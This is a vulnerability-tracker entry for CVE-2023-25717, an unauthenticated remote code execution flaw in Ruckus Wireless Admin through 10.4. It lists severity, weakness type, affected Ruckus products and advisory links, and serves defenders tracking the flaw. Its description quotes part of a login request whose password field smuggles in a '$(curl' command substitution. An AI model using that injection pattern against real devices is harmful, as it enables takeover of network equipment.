Vulnerability Monitor

The vendors, products, and vulnerabilities you care about

CVE-2023-25717

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Published

2023-02-13T20:15:10.973

Last Modified

2025-03-10T20:48:20.863

Status

Analyzed

Source

[email protected]

Severity

CVSSv3.1: 9.8 (CRITICAL)

Weaknesses

Type: Primary
CWE-94
Type: Secondary
CWE-94

Affected Vendors & Products

Type	Vendor	Product	Version/Range	Vulnerable?
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone_ap	< 6.1.0.0.9240	Yes
Hardware	ruckuswireless	e510	-	No
Hardware	ruckuswireless	h320	-	No
Hardware	ruckuswireless	h350	-	No
Hardware	ruckuswireless	h510	-	No
Hardware	ruckuswireless	h550	-	No
Hardware	ruckuswireless	m510	-	No
Hardware	ruckuswireless	r310	-	No
Hardware	ruckuswireless	r320	-	No
Hardware	ruckuswireless	r350	-	No
Hardware	ruckuswireless	r510	-	No
Hardware	ruckuswireless	r550	-	No
Hardware	ruckuswireless	r610	-	No
Hardware	ruckuswireless	r650	-	No
Hardware	ruckuswireless	r710	-	No
Hardware	ruckuswireless	r720	-	No
Hardware	ruckuswireless	r730	-	No
Hardware	ruckuswireless	r750	-	No
Hardware	ruckuswireless	r760	-	No
Hardware	ruckuswireless	r850	-	No
Hardware	ruckuswireless	sz-144	-	No
Hardware	ruckuswireless	sz100	-	No
Hardware	ruckuswireless	sz300	-	No
Hardware	ruckuswireless	t310c	-	No
Hardware	ruckuswireless	t310d	-	No
Hardware	ruckuswireless	t310n	-	No
Hardware	ruckuswireless	t310s	-	No
Hardware	ruckuswireless	t350c	-	No
Hardware	ruckuswireless	t350d	-	No
Hardware	ruckuswireless	t350se	-	No
Hardware	ruckuswireless	t610	-	No
Hardware	ruckuswireless	t710	-	No
Hardware	ruckuswireless	t710s	-	No
Hardware	ruckuswireless	t750	-	No
Hardware	ruckuswireless	t750se	-	No
Hardware	ruckuswireless	t811-cm	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone_ap	< 5.2.2.0.2064	Yes
Hardware	ruckuswireless	e510	-	No
Hardware	ruckuswireless	h320	-	No
Hardware	ruckuswireless	h510	-	No
Hardware	ruckuswireless	m510	-	No
Hardware	ruckuswireless	r310	-	No
Hardware	ruckuswireless	r320	-	No
Hardware	ruckuswireless	r500	-	No
Hardware	ruckuswireless	r510	-	No
Hardware	ruckuswireless	r550	-	No
Hardware	ruckuswireless	r600	-	No
Hardware	ruckuswireless	r610	-	No
Hardware	ruckuswireless	r650	-	No
Hardware	ruckuswireless	r710	-	No
Hardware	ruckuswireless	r720	-	No
Hardware	ruckuswireless	r730	-	No
Hardware	ruckuswireless	r750	-	No
Hardware	ruckuswireless	r850	-	No
Hardware	ruckuswireless	t300	-	No
Hardware	ruckuswireless	t301n	-	No
Hardware	ruckuswireless	t301s	-	No
Hardware	ruckuswireless	t310c	-	No
Hardware	ruckuswireless	t310d	-	No
Hardware	ruckuswireless	t310n	-	No
Hardware	ruckuswireless	t310s	-	No
Hardware	ruckuswireless	t504	-	No
Hardware	ruckuswireless	t610	-	No
Hardware	ruckuswireless	t710	-	No
Hardware	ruckuswireless	t710s	-	No
Hardware	ruckuswireless	t750	-	No
Hardware	ruckuswireless	t750se	-	No
Hardware	ruckuswireless	t811-cm	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone_ap	< 3.6.2.0.795	Yes
Hardware	ruckuswireless	h500	-	No
Hardware	ruckuswireless	r300	-	No
Hardware	ruckuswireless	r700	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone_ap	< 6.1.1.0.1274	Yes
Hardware	ruckuswireless	r560	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone	< 5.2.1.3	Yes
Hardware	ruckuswireless	sz-144	-	No
Hardware	ruckuswireless	sz300	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone	6.1.0.0.935	Yes
Hardware	ruckuswireless	sz-144	-	No
Hardware	ruckuswireless	sz100	-	No
Hardware	ruckuswireless	sz300	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Hardware	ruckuswireless	m510-jp	-	No
Hardware	ruckuswireless	p300	-	No
Hardware	ruckuswireless	q410	-	No
Hardware	ruckuswireless	q710	-	No
Hardware	ruckuswireless	q910	-	No
Hardware	ruckuswireless	t811-cm$non-spf$	-	No
Hardware	ruckuswireless	zd1000	-	No
Hardware	ruckuswireless	zd1100	-	No
Hardware	ruckuswireless	zd1200	-	No
Hardware	ruckuswireless	zd3000	-	No
Hardware	ruckuswireless	zd5000	-	No
Application	ruckuswireless	ruckus_wireless_admin	≤ 10.4	Yes
Operating System	ruckuswireless	smartzone	< 5.2.1.3.1695	Yes
Hardware	ruckuswireless	sz-144-federal	-	No
Hardware	ruckuswireless	sz300-federal	-	No

References

https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ Exploit, Third Party Advisory ([email protected])
https://support.ruckuswireless.com/security_bulletins/315 Patch, Product, Vendor Advisory ([email protected])
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ Exploit, Third Party Advisory (af854a3a-2127-422b-91ae-364da2661108)
https://support.ruckuswireless.com/security_bulletins/315 Patch, Product, Vendor Advisory (af854a3a-2127-422b-91ae-364da2661108)